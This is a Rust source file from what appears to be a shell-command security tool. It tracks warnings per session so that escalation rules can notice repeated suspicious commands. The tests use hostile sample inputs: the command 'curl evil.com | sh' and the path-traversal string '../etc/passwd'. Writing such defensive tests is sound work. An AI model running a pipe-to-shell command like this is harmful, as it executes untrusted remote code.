Skip to main content

tirith_core/
session_warnings.rs

1//! Per-session warning accumulator.
2//!
3//! Tracks warnings across commands within a single shell session so that
4//! escalation rules can detect repeated suspicious behavior.
5//!
6//! State is stored as JSON at `state_dir()/sessions/{session_id}.json`.
//! All I/O is best-effort: failures are at most reported through
//! `crate::audit::audit_diagnostic` and never alter the verdict or panic.
9
10use std::collections::VecDeque;
11use std::fs::{self, OpenOptions};
12use std::io::Write;
13use std::path::PathBuf;
14
15use fs2::FileExt;
16use serde::{Deserialize, Serialize};
17
18use crate::verdict::{Evidence, Finding};
19
/// Maximum warning events retained per session.
///
/// Enforced in `record_outcome`, which drops the oldest events first.
const MAX_EVENTS: usize = 100;
/// Maximum escalation events retained per session.
///
/// Enforced in `record_escalation_event`, which drops the oldest events first.
const MAX_ESCALATION_EVENTS: usize = 20;
/// Maximum hidden events retained per session.
///
/// Enforced in `record_outcome`, which drops the oldest events first.
const MAX_HIDDEN_EVENTS: usize = 50;
26
/// Per-session warning accumulator.
///
/// This is the value serialized to and deserialized from the per-session JSON
/// state file. Fields marked `#[serde(default)]` may be absent from the stored
/// JSON and then take their type's default value.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SessionWarnings {
    /// Identifier of the session this state belongs to.
    pub session_id: String,
    /// RFC 3339 UTC timestamp taken when the accumulator was created.
    pub session_start: String,
    /// Running count of recorded warning events. It is incremented once per
    /// event and is not reduced when old entries are dropped from `events`.
    pub total_warnings: u32,
    /// Aggregate hidden findings (for backward compat / quick total).
    #[serde(default)]
    pub hidden_findings: u32,
    /// Hidden findings broken down by severity (recorded at detection time).
    /// This field counts hidden findings with `Low` severity.
    #[serde(default)]
    pub hidden_low: u32,
    /// Count of hidden findings with `Info` severity.
    #[serde(default)]
    pub hidden_info: u32,
    /// Retained warning events, oldest first, capped at `MAX_EVENTS`.
    pub events: VecDeque<WarningEvent>,
    /// Escalation events: records when an escalation rule fired, scoped per
    /// (rule_id, domain) key. Used for cooldown matching.
    #[serde(default)]
    pub escalation_events: VecDeque<EscalationEvent>,
    /// Findings hidden by paranoia filtering, for `tirith warnings --hidden`.
    #[serde(default)]
    pub hidden_events: VecDeque<HiddenEvent>,
}
50
/// A single warning event within a session.
///
/// One event is stored per warning finding passed to `record_outcome`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct WarningEvent {
    /// RFC 3339 UTC timestamp taken when the outcome was recorded; all events
    /// recorded by one `record_outcome` call share the same value.
    pub timestamp: String,
    /// String form of the finding's rule id.
    pub rule_id: String,
    /// String form of the finding's severity.
    pub severity: String,
    /// Finding title after `crate::util::truncate_bytes(.., 120)`.
    pub title: String,
    /// Command text after `crate::redact::redact_command_text` and
    /// `crate::util::truncate_bytes(.., 120)`.
    pub command_redacted: String,
    /// Lowercased hostnames taken from the finding's evidence, sorted and
    /// de-duplicated (see `extract_domains_from_evidence`).
    pub domains: Vec<String>,
}
61
/// Records when an escalation rule fired, for cooldown scoping.
///
/// `rule_id` is the specific finding rule that crossed the threshold, or `"*"`
/// for wildcard aggregate escalations. `domain` is set only for `domain_scoped`
/// rules — one domain's escalation does not cool down other domains.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct EscalationEvent {
    /// RFC 3339 UTC timestamp taken when the escalation was recorded.
    pub timestamp: String,
    /// Rule id copied from the escalation hit.
    pub rule_id: String,
    /// Domain copied from the escalation hit. The key is omitted from the
    /// JSON when `None` and defaults to `None` when missing on load.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub domain: Option<String>,
}
74
/// A finding that was hidden by paranoia filtering (recorded for `tirith warnings --hidden`).
///
/// Carries the same fields as `WarningEvent` except `domains`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct HiddenEvent {
    /// RFC 3339 UTC timestamp taken when the outcome was recorded.
    pub timestamp: String,
    /// String form of the hidden finding's rule id.
    pub rule_id: String,
    /// String form of the hidden finding's severity.
    pub severity: String,
    /// Finding title after `crate::util::truncate_bytes(.., 120)`.
    pub title: String,
    /// Command text after redaction and `crate::util::truncate_bytes(.., 120)`.
    pub command_redacted: String,
}
84
85impl SessionWarnings {
86    /// Create a new empty accumulator.
87    fn new(session_id: &str) -> Self {
88        Self {
89            session_id: session_id.to_string(),
90            session_start: chrono::Utc::now().to_rfc3339(),
91            total_warnings: 0,
92            hidden_findings: 0,
93            hidden_low: 0,
94            hidden_info: 0,
95            events: VecDeque::new(),
96            escalation_events: VecDeque::new(),
97            hidden_events: VecDeque::new(),
98        }
99    }
100
101    /// Count events matching `rule_id` within the last `window_minutes`.
102    pub fn count_by_rule(&self, rule_id: &str, window_minutes: u64) -> u32 {
103        let cutoff = cutoff_time(window_minutes);
104        self.events
105            .iter()
106            .filter(|e| e.rule_id == rule_id && e.timestamp.as_str() >= cutoff.as_str())
107            .count() as u32
108    }
109
110    /// Count events matching both `rule_id` and `domain` within the window.
111    pub fn count_by_rule_and_domain(
112        &self,
113        rule_id: &str,
114        domain: &str,
115        window_minutes: u64,
116    ) -> u32 {
117        let cutoff = cutoff_time(window_minutes);
118        let domain_lower = domain.to_lowercase();
119        self.events
120            .iter()
121            .filter(|e| {
122                e.rule_id == rule_id
123                    && e.timestamp.as_str() >= cutoff.as_str()
124                    && e.domains.iter().any(|d| d.to_lowercase() == domain_lower)
125            })
126            .count() as u32
127    }
128
129    /// Count all events within the window.
130    pub fn count_all(&self, window_minutes: u64) -> u32 {
131        let cutoff = cutoff_time(window_minutes);
132        self.events
133            .iter()
134            .filter(|e| e.timestamp.as_str() >= cutoff.as_str())
135            .count() as u32
136    }
137
138    /// Top rules by frequency (descending).
139    pub fn top_rules(&self) -> Vec<(String, u32)> {
140        let mut counts = std::collections::HashMap::<String, u32>::new();
141        for e in &self.events {
142            *counts.entry(e.rule_id.clone()).or_default() += 1;
143        }
144        let mut sorted: Vec<_> = counts.into_iter().collect();
145        sorted.sort_by_key(|s| std::cmp::Reverse(s.1));
146        sorted
147    }
148}
149
150/// Compute the RFC 3339 cutoff timestamp for windowed queries.
151fn cutoff_time(window_minutes: u64) -> String {
152    let cutoff =
153        chrono::Utc::now() - chrono::Duration::minutes(window_minutes.min(u32::MAX as u64) as i64);
154    cutoff.to_rfc3339()
155}
156
157/// Validate session_id and return the state file path.
158///
159/// Session IDs must be non-empty, <=128 chars, and contain only
160/// `[a-zA-Z0-9_-]` to prevent path traversal.
161pub fn session_state_path(session_id: &str) -> Option<PathBuf> {
162    if session_id.is_empty() || session_id.len() > 128 {
163        return None;
164    }
165    if !session_id
166        .chars()
167        .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
168    {
169        return None;
170    }
171    let state = crate::policy::state_dir()?;
172    Some(state.join("sessions").join(format!("{session_id}.json")))
173}
174
175/// Load session warnings from disk. Returns an empty accumulator on any error.
176///
177/// Takes a shared lock so readers never observe the transient empty state
178/// that occurs while `record_warning()` truncates and rewrites the file.
179pub fn load(session_id: &str) -> SessionWarnings {
180    let path = match session_state_path(session_id) {
181        Some(p) => p,
182        None => return SessionWarnings::new(session_id),
183    };
184
185    let file = match fs::File::open(&path) {
186        Ok(f) => f,
187        Err(_) => return SessionWarnings::new(session_id),
188    };
189
190    // Shared lock prevents reading mid-truncate from a concurrent writer.
191    if fs2::FileExt::lock_shared(&file).is_err() && fs2::FileExt::try_lock_shared(&file).is_err() {
192        return SessionWarnings::new(session_id);
193    }
194
195    use std::io::Read;
196    let mut content = String::new();
197    let result = (&file).read_to_string(&mut content);
198    let _ = fs2::FileExt::unlock(&file);
199
200    if result.is_err() || content.is_empty() {
201        return SessionWarnings::new(session_id);
202    }
203
204    serde_json::from_str::<SessionWarnings>(&content).unwrap_or_else(|e| {
205        crate::audit::audit_diagnostic(format!(
206            "tirith: session: corrupt state for '{}': {e} — resetting",
207            session_id
208        ));
209        SessionWarnings::new(session_id)
210    })
211}
212
213/// Record warning findings into the session accumulator.
214///
215/// Thin wrapper around `record_outcome` with no hidden findings.
216pub fn record_warning(session_id: &str, findings: &[&Finding], cmd: &str, dlp_patterns: &[String]) {
217    record_outcome(session_id, findings, &[], cmd, dlp_patterns);
218}
219
220/// Record warning findings and hidden findings into the session accumulator.
221///
222/// Hidden findings are actual `Finding` references (not just counts) so that
223/// full event details can be stored for `tirith warnings --hidden`.
224///
225/// Delegates to [`with_session_locked`] for atomic lock-read-modify-write.
226/// Never panics or alters the verdict on I/O failure.
227pub fn record_outcome(
228    session_id: &str,
229    warn_findings: &[&Finding],
230    hidden_findings_list: &[&Finding],
231    cmd: &str,
232    dlp_patterns: &[String],
233) {
234    if warn_findings.is_empty() && hidden_findings_list.is_empty() {
235        return;
236    }
237
238    // Compute hidden counts from the actual findings list.
239    let hidden_count = hidden_findings_list.len() as u32;
240    let hidden_low = hidden_findings_list
241        .iter()
242        .filter(|f| f.severity == crate::verdict::Severity::Low)
243        .count() as u32;
244    let hidden_info = hidden_findings_list
245        .iter()
246        .filter(|f| f.severity == crate::verdict::Severity::Info)
247        .count() as u32;
248
249    // Pre-compute redacted command outside the lock to minimise hold time.
250    let command_redacted = crate::redact::redact_command_text(cmd, dlp_patterns);
251    let command_redacted = crate::util::truncate_bytes(&command_redacted, 120);
252    let now = chrono::Utc::now().to_rfc3339();
253
254    // Collect finding data we need so the closure does not borrow the slices.
255    struct FindingData {
256        rule_id: String,
257        severity: String,
258        title: String,
259        domains: Vec<String>,
260    }
261    let finding_data: Vec<FindingData> = warn_findings
262        .iter()
263        .map(|f| FindingData {
264            rule_id: f.rule_id.to_string(),
265            severity: f.severity.to_string(),
266            title: crate::util::truncate_bytes(&f.title, 120),
267            domains: extract_domains_from_evidence(&f.evidence),
268        })
269        .collect();
270
271    // Collect hidden finding data for HiddenEvent storage.
272    let hidden_data: Vec<FindingData> = hidden_findings_list
273        .iter()
274        .map(|f| FindingData {
275            rule_id: f.rule_id.to_string(),
276            severity: f.severity.to_string(),
277            title: crate::util::truncate_bytes(&f.title, 120),
278            domains: Vec::new(), // not needed for hidden events
279        })
280        .collect();
281
282    with_session_locked(session_id, |session| {
283        // Increment hidden findings count
284        session.hidden_findings = session.hidden_findings.saturating_add(hidden_count);
285        session.hidden_low = session.hidden_low.saturating_add(hidden_low);
286        session.hidden_info = session.hidden_info.saturating_add(hidden_info);
287
288        // Append warning events
289        for fd in &finding_data {
290            let event = WarningEvent {
291                timestamp: now.clone(),
292                rule_id: fd.rule_id.clone(),
293                severity: fd.severity.clone(),
294                title: fd.title.clone(),
295                command_redacted: command_redacted.clone(),
296                domains: fd.domains.clone(),
297            };
298            session.events.push_back(event);
299            session.total_warnings = session.total_warnings.saturating_add(1);
300        }
301
302        // Append hidden events
303        for hd in &hidden_data {
304            session.hidden_events.push_back(HiddenEvent {
305                timestamp: now.clone(),
306                rule_id: hd.rule_id.clone(),
307                severity: hd.severity.clone(),
308                title: hd.title.clone(),
309                command_redacted: command_redacted.clone(),
310            });
311        }
312
313        // Cap warning events
314        while session.events.len() > MAX_EVENTS {
315            session.events.pop_front();
316        }
317
318        // Cap hidden events
319        while session.hidden_events.len() > MAX_HIDDEN_EVENTS {
320            session.hidden_events.pop_front();
321        }
322    });
323}
324
325/// Record escalation events into the session accumulator.
326///
327/// Called from `post_process_verdict` after an escalation rule upgrades the
328/// action. Must happen outside `record_outcome` because escalated blocks are
329/// `Action::Block` which does not enter the Warn/WarnAck recording gate.
330pub fn record_escalation_event(session_id: &str, hits: &[crate::escalation::EscalationHit]) {
331    if hits.is_empty() {
332        return;
333    }
334
335    let now = chrono::Utc::now().to_rfc3339();
336
337    with_session_locked(session_id, |session| {
338        for hit in hits {
339            session.escalation_events.push_back(EscalationEvent {
340                timestamp: now.clone(),
341                rule_id: hit.rule_id.clone(),
342                domain: hit.domain.clone(),
343            });
344        }
345        // Cap escalation events
346        while session.escalation_events.len() > MAX_ESCALATION_EVENTS {
347            session.escalation_events.pop_front();
348        }
349    });
350}
351
/// Shared helper: open session file, acquire exclusive lock, read or create
/// session state, call `mutate` to modify it, serialize and write back,
/// then unlock and run opportunistic GC.
///
/// `mutate` is called at most once. It is not called when the session id is
/// rejected, the state directory cannot be created, the path is a symlink
/// (Unix), the file cannot be opened, or the lock cannot be acquired.
///
/// All I/O is best-effort; failures are logged diagnostically and never panic.
fn with_session_locked<F>(session_id: &str, mutate: F)
where
    F: FnOnce(&mut SessionWarnings),
{
    // An invalid session id (or no state directory) means nothing is recorded.
    let path = match session_state_path(session_id) {
        Some(p) => p,
        None => return,
    };

    // Ensure directory exists
    if let Some(parent) = path.parent() {
        if let Err(e) = fs::create_dir_all(parent) {
            crate::audit::audit_diagnostic(format!(
                "tirith: session: cannot create state dir {}: {e}",
                parent.display()
            ));
            return;
        }
    }

    // Refuse to follow symlinks on Unix
    // `symlink_metadata` inspects the path itself rather than its target.
    // A metadata error (e.g. the file does not exist yet) falls through to the
    // open below, which also passes `O_NOFOLLOW`.
    #[cfg(unix)]
    {
        match std::fs::symlink_metadata(&path) {
            Ok(meta) if meta.file_type().is_symlink() => {
                crate::audit::audit_diagnostic(format!(
                    "tirith: session: refusing to follow symlink at {}",
                    path.display()
                ));
                return;
            }
            _ => {}
        }
    }

    // Open file for read+write (atomic load-modify-write under lock).
    // `create(true)` without `truncate` keeps existing content so it can be
    // read back once the lock is held.
    let mut open_opts = OpenOptions::new();
    open_opts.read(true).write(true).create(true);
    #[cfg(unix)]
    {
        use std::os::unix::fs::OpenOptionsExt;
        open_opts.mode(0o600);
        open_opts.custom_flags(libc::O_NOFOLLOW);
    }

    let file = match open_opts.open(&path) {
        Ok(f) => f,
        Err(e) => {
            crate::audit::audit_diagnostic(format!(
                "tirith: session: cannot open {} — escalation may be impaired: {e}",
                path.display()
            ));
            return;
        }
    };

    // Harden permissions on existing files
    // (the `mode` above only matters when the file is newly created).
    #[cfg(unix)]
    {
        use std::os::unix::fs::PermissionsExt;
        let _ = file.set_permissions(std::fs::Permissions::from_mode(0o600));
    }

    // Acquire exclusive lock BEFORE reading — this is the atomicity guarantee.
    // The non-blocking variant is attempted only if the blocking call errors.
    let locked = file.lock_exclusive().is_ok() || file.try_lock_exclusive().is_ok();
    if !locked {
        crate::audit::audit_diagnostic(format!(
            "tirith: session: cannot lock {} — recording skipped",
            path.display()
        ));
        return;
    }

    // Read existing state under lock
    // NOTE(review): the read result is discarded, so a read error is not
    // logged; whatever ended up in `content` is then treated as a fresh
    // (empty) or corrupt session and overwritten below — confirm this is
    // the intended best-effort behavior.
    use std::io::Read;
    let mut content = String::new();
    let _ = (&file).read_to_string(&mut content);
    let mut session: SessionWarnings = if content.is_empty() {
        SessionWarnings::new(session_id)
    } else {
        serde_json::from_str(&content).unwrap_or_else(|e| {
            crate::audit::audit_diagnostic(format!(
                "tirith: session: corrupt state for '{}': {e} — resetting",
                session_id
            ));
            SessionWarnings::new(session_id)
        })
    };

    // Let caller mutate the session state
    mutate(&mut session);

    // Serialize before touching the file so a serialization failure leaves
    // the stored content untouched.
    let json = match serde_json::to_string(&session) {
        Ok(j) => j,
        Err(e) => {
            crate::audit::audit_diagnostic(format!(
                "tirith: session: failed to serialize warnings: {e}"
            ));
            let _ = fs2::FileExt::unlock(&file);
            return;
        }
    };

    // Truncate + write under the same lock
    // The earlier read moved the file cursor, so it is rewound to the start
    // after truncating.
    use std::io::Seek;
    if file.set_len(0).is_err() || (&file).seek(std::io::SeekFrom::Start(0)).is_err() {
        crate::audit::audit_diagnostic(format!(
            "tirith: session: truncate/seek failed for {} — skipping write",
            path.display()
        ));
        let _ = fs2::FileExt::unlock(&file);
        return;
    }
    // Write and flush failures are logged but do not abort: the code still
    // proceeds to sync, unlock and GC.
    let mut writer = std::io::BufWriter::new(&file);
    if let Err(e) = writer.write_all(json.as_bytes()) {
        crate::audit::audit_diagnostic(format!(
            "tirith: session: write failed for {}: {e}",
            path.display()
        ));
    }
    if let Err(e) = writer.flush() {
        crate::audit::audit_diagnostic(format!(
            "tirith: session: flush failed for {}: {e}",
            path.display()
        ));
    }
    let _ = file.sync_all();
    let _ = fs2::FileExt::unlock(&file);

    // Opportunistic GC: clean up stale session files, rate-limited to once per hour.
    // Runs after the lock has been released.
    opportunistic_gc();
}
489
490/// Extract hostnames from finding evidence.
491pub fn extract_domains_from_evidence(evidence: &[Evidence]) -> Vec<String> {
492    let mut domains = Vec::new();
493    for ev in evidence {
494        match ev {
495            Evidence::Url { raw } => {
496                if let Some(host) = extract_host(raw) {
497                    domains.push(host);
498                }
499            }
500            Evidence::HostComparison { raw_host, .. } => {
501                domains.push(raw_host.to_lowercase());
502            }
503            _ => {}
504        }
505    }
506    domains.sort();
507    domains.dedup();
508    domains
509}
510
511/// Extract host from a URL string.
512fn extract_host(url: &str) -> Option<String> {
513    if let Ok(parsed) = url::Url::parse(url) {
514        return parsed.host_str().map(|h| h.to_lowercase());
515    }
516    // Schemeless fallback: take first segment before /
517    let candidate = url.split('/').next()?;
518    if candidate.contains('.') && !candidate.contains(' ') {
519        let host = candidate.split(':').next().unwrap_or(candidate);
520        return Some(host.to_lowercase());
521    }
522    None
523}
524
525/// Opportunistic garbage collection of stale session files.
526///
527/// Rate-limited to once per hour via a `.last_gc` marker file in the sessions
528/// directory. Uses a 72-hour cutoff for stale sessions.
529fn opportunistic_gc() {
530    let gc_marker = match crate::policy::state_dir() {
531        Some(d) => d.join("sessions").join(".last_gc"),
532        None => return,
533    };
534    if let Ok(meta) = fs::metadata(&gc_marker) {
535        if let Ok(modified) = meta.modified() {
536            if let Ok(age) = modified.elapsed() {
537                if age.as_secs() < 3600 {
538                    return;
539                }
540            }
541        }
542    }
543    // Touch the marker file before running GC (best-effort).
544    let _ = fs::write(&gc_marker, "");
545    gc_stale_sessions(72);
546}
547
548/// Remove session files older than `max_age_hours`.
549pub fn gc_stale_sessions(max_age_hours: u64) {
550    let state = match crate::policy::state_dir() {
551        Some(s) => s,
552        None => return,
553    };
554    let sessions_dir = state.join("sessions");
555    let entries = match fs::read_dir(&sessions_dir) {
556        Ok(e) => e,
557        Err(_) => return,
558    };
559
560    let max_age = std::time::Duration::from_secs(max_age_hours * 3600);
561    let now = std::time::SystemTime::now();
562
563    for entry in entries.flatten() {
564        let path = entry.path();
565        if path.extension().and_then(|e| e.to_str()) != Some("json") {
566            continue;
567        }
568        let meta = match fs::metadata(&path) {
569            Ok(m) => m,
570            Err(_) => continue,
571        };
572        let modified = match meta.modified() {
573            Ok(t) => t,
574            Err(_) => continue,
575        };
576        if let Ok(age) = now.duration_since(modified) {
577            if age > max_age {
578                let _ = fs::remove_file(&path);
579            }
580        }
581    }
582}
583
584/// Delete a session file.
585pub fn clear_session(session_id: &str) {
586    if let Some(path) = session_state_path(session_id) {
587        let _ = fs::remove_file(&path);
588    }
589}
590
#[cfg(test)]
mod tests {
    use super::*;
    use crate::verdict::{Evidence, Finding, RuleId, Severity};

    /// Build a finding whose only evidence is a URL on `evil.example.com`.
    fn make_finding(rule_id: RuleId, severity: Severity) -> Finding {
        Finding {
            rule_id,
            severity,
            title: "Test finding".to_string(),
            description: "desc".to_string(),
            evidence: vec![Evidence::Url {
                raw: "https://evil.example.com/path".to_string(),
            }],
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        }
    }

    /// Build a warning event with an explicit timestamp and fixed filler text.
    fn event_at(timestamp: String, rule_id: &str, severity: &str, domains: &[&str]) -> WarningEvent {
        WarningEvent {
            timestamp,
            rule_id: rule_id.to_string(),
            severity: severity.to_string(),
            title: "test".to_string(),
            command_redacted: "cmd".to_string(),
            domains: domains.iter().map(|d| d.to_string()).collect(),
        }
    }

    /// Build a warning event stamped with the current time.
    fn recent_event(rule_id: &str, severity: &str, domains: &[&str]) -> WarningEvent {
        event_at(chrono::Utc::now().to_rfc3339(), rule_id, severity, domains)
    }

    #[test]
    fn test_session_state_path_validation() {
        // Valid IDs
        for accepted in ["abc-123_DEF", "a"].iter() {
            assert!(session_state_path(accepted).is_some());
        }

        // Empty, path traversal, and special characters are all rejected
        let rejected_ids = [
            "",
            "../etc/passwd",
            "foo/bar",
            "..",
            "foo bar",
            "foo.bar",
        ];
        for rejected in rejected_ids.iter() {
            assert!(session_state_path(rejected).is_none());
        }

        // Length boundary: 129 is too long, 128 is accepted
        assert!(session_state_path(&"a".repeat(129)).is_none());
        assert!(session_state_path(&"a".repeat(128)).is_some());
    }

    #[test]
    fn test_load_returns_default_on_missing() {
        let loaded = load("nonexistent-session-id-12345");
        assert_eq!(loaded.session_id, "nonexistent-session-id-12345");
        assert_eq!(loaded.total_warnings, 0);
        assert!(loaded.events.is_empty());
    }

    #[cfg(unix)]
    #[test]
    fn test_record_and_load_cycle() {
        let _guard = crate::TEST_ENV_LOCK
            .lock()
            .unwrap_or_else(|e| e.into_inner());

        let dir = tempfile::tempdir().unwrap();
        let state_home = dir.path().join("state");
        unsafe { std::env::set_var("XDG_STATE_HOME", &state_home) };

        let session_id = "test-session-rec-001";

        // First batch: two findings in one call
        let curl_pipe = make_finding(RuleId::CurlPipeShell, Severity::High);
        let non_ascii = make_finding(RuleId::NonAsciiHostname, Severity::Medium);
        record_warning(session_id, &[&curl_pipe, &non_ascii], "curl evil.com | sh", &[]);

        let after_first = load(session_id);
        assert_eq!(after_first.total_warnings, 2);
        assert_eq!(after_first.events.len(), 2);
        assert_eq!(after_first.events[0].rule_id, "curl_pipe_shell");
        assert_eq!(after_first.events[1].rule_id, "non_ascii_hostname");

        // Domains come from the finding's URL evidence
        assert!(after_first.events[0]
            .domains
            .contains(&"evil.example.com".to_string()));

        // Second batch accumulates on top of the first
        let shortened = make_finding(RuleId::ShortenedUrl, Severity::Low);
        record_warning(session_id, &[&shortened], "bit.ly/foo", &[]);

        let after_second = load(session_id);
        assert_eq!(after_second.total_warnings, 3);
        assert_eq!(after_second.events.len(), 3);

        // Clearing resets to an empty accumulator
        clear_session(session_id);
        let after_clear = load(session_id);
        assert_eq!(after_clear.total_warnings, 0);

        unsafe { std::env::remove_var("XDG_STATE_HOME") };
    }

    #[test]
    fn test_count_by_rule_with_window() {
        let mut session = SessionWarnings::new("test");
        // One event right now
        session
            .events
            .push_back(recent_event("curl_pipe_shell", "HIGH", &[]));
        // One event from two hours ago
        let two_hours_ago = (chrono::Utc::now() - chrono::Duration::hours(2)).to_rfc3339();
        session
            .events
            .push_back(event_at(two_hours_ago, "curl_pipe_shell", "HIGH", &[]));

        // 60-min window should only catch the recent one
        assert_eq!(session.count_by_rule("curl_pipe_shell", 60), 1);
        // 180-min window should catch both
        assert_eq!(session.count_by_rule("curl_pipe_shell", 180), 2);
        // Different rule should match zero
        assert_eq!(session.count_by_rule("non_ascii_hostname", 180), 0);
    }

    #[test]
    fn test_count_by_rule_and_domain() {
        let mut session = SessionWarnings::new("test");
        session
            .events
            .push_back(recent_event("non_ascii_hostname", "MEDIUM", &["evil.com"]));
        session
            .events
            .push_back(recent_event("non_ascii_hostname", "MEDIUM", &["good.com"]));

        assert_eq!(
            session.count_by_rule_and_domain("non_ascii_hostname", "evil.com", 60),
            1
        );
        assert_eq!(
            session.count_by_rule_and_domain("non_ascii_hostname", "good.com", 60),
            1
        );
        assert_eq!(
            session.count_by_rule_and_domain("non_ascii_hostname", "other.com", 60),
            0
        );
    }

    #[test]
    fn test_count_all() {
        let mut session = SessionWarnings::new("test");
        for _ in 0..5 {
            session.events.push_back(recent_event("any_rule", "LOW", &[]));
        }
        assert_eq!(session.count_all(60), 5);
    }

    #[test]
    fn test_top_rules() {
        let mut session = SessionWarnings::new("test");
        for _ in 0..3 {
            session.events.push_back(recent_event("rule_a", "LOW", &[]));
        }
        session.events.push_back(recent_event("rule_b", "LOW", &[]));

        let top = session.top_rules();
        assert_eq!(top[0], ("rule_a".to_string(), 3));
        assert_eq!(top[1], ("rule_b".to_string(), 1));
    }

    #[test]
    fn test_event_cap() {
        let mut session = SessionWarnings::new("test");
        for i in 0..150 {
            session
                .events
                .push_back(recent_event(&format!("rule_{i}"), "LOW", &[]));
            session.total_warnings += 1;
        }
        // Manually apply cap as record_warning would
        while session.events.len() > MAX_EVENTS {
            session.events.pop_front();
        }
        assert_eq!(session.events.len(), MAX_EVENTS);
        assert_eq!(session.total_warnings, 150);
    }

    #[test]
    fn test_extract_domains_from_evidence() {
        let evidence = vec![
            Evidence::Url {
                raw: "https://evil.example.com/path".to_string(),
            },
            Evidence::HostComparison {
                raw_host: "GITHUB.COM".to_string(),
                similar_to: "g1thub.com".to_string(),
            },
            Evidence::Text {
                detail: "irrelevant".to_string(),
            },
        ];
        let domains = extract_domains_from_evidence(&evidence);
        assert!(domains.contains(&"evil.example.com".to_string()));
        assert!(domains.contains(&"github.com".to_string()));
        assert_eq!(domains.len(), 2);
    }
}
842}